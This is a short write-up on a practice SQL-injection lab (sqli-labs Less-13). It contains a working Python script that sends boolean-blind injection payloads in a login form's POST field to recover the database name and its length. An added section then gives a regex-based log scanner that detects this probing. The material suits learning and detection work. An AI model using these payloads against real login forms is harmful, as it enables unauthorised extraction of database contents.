Code approach
1. I mostly referred to other people's code. There really is a big difference between what I wrote and what others wrote, which mainly comes down to my coding ability still needing improvement.
2. Bundle the functionality into a single function and call it using the small *args trick. The parameter itself does not hold the argument values, but *args does (it collects the extra arguments as a tuple). That is, as follows:
3. Also made use of format: because the request is a POST, the payload is not easy to set directly, but building it with format works much better.
```python
#!/usr/bin/env python
#encoding:utf-8
#by i3ekr

import requests

url = "http://127.0.0.1/Less-13/?id=1"
# {0} is filled by format() with the guessed length / character position, {1} with the guessed character
database_length_payload = "abc' ) or length((select database()))={0} #"
database_name_payload = "xxxxxxxxx')or(select substr((select database()),{0},1))='{1}' # &passwd=1"
database_length = 0
database_name = ""

def get_value(payload, value, *args):
    # With no extra argument the payload has one placeholder, otherwise two
    if len(args) == 0:
        payload = payload.format(value)
    else:
        payload = payload.format(value, args[0])
    data = {"uname": payload, "passwd": "1"}

    print("[*] payload:%s" % (data))
    html = requests.post(url, data=data)
    # Less-13 renders flag.jpg on a successful login, i.e. when the injected condition is true
    if "flag.jpg" in html.text:
        return True
    else:
        return False

# Find the length of the database name
for i in range(100):
    if get_value(database_length_payload, i):
        database_length = i
        break

# Guess the database name one character at a time
for n in range(1, database_length + 1):
    for s in "qwertyuiopasdfghjklzxcvbnm":
        if get_value(database_name_payload, n, s):
            database_name += s
            break

print(database_name)
print(database_length)
```
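Seen from the defending side, the script above produces a long run of POSTs from one source, one request per guessed length or character. The following is an added example (not part of the original write-up) that flags that pattern in a constructed application log; the log format, IPs and the `scan_log` helper are all assumptions made for the demonstration.

```python
import re
from collections import Counter

# Constructed sample log (not from the original page), one POST per line in the
# form "<ip> POST <path> uname=<value>". The uname values mirror the shape of the
# payloads the script above sends; the last two lines are ordinary logins.
SAMPLE_LOG = """\
10.0.0.5 POST /Less-13/ uname=abc') or length((select database()))=1 #
10.0.0.5 POST /Less-13/ uname=abc') or length((select database()))=2 #
10.0.0.5 POST /Less-13/ uname=abc') or length((select database()))=8 #
10.0.0.5 POST /Less-13/ uname=xxxxxxxxx')or(select substr((select database()),1,1))='q' # &passwd=1
10.0.0.5 POST /Less-13/ uname=xxxxxxxxx')or(select substr((select database()),1,1))='s' # &passwd=1
10.0.0.9 POST /Less-13/ uname=dumb
10.0.0.9 POST /Less-13/ uname=o'brien
"""

# Signature of boolean-blind probing as used against Less-13: a quote that closes
# the ('...') context, then OR and a length()/substr() test, optionally wrapped in
# a subselect. A lone apostrophe in a normal name does not match.
BLIND_RE = re.compile(
    r"'\s*\)\s*or\s*\(?\s*(select\s+)?(length|substr)\s*\(", re.IGNORECASE)

def parse_line(line):
    """Split one constructed log line into (ip, uname)."""
    ip, _method, _path, body = line.split(" ", 3)
    uname = body[len("uname="):] if body.startswith("uname=") else ""
    return ip, uname

def scan_log(text, threshold=3):
    """Return {ip: hits} for sources with at least `threshold` matching requests."""
    hits = Counter()
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, uname = parse_line(line)
        if BLIND_RE.search(uname):
            hits[ip] += 1
    return {ip: n for ip, n in hits.items() if n >= threshold}

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```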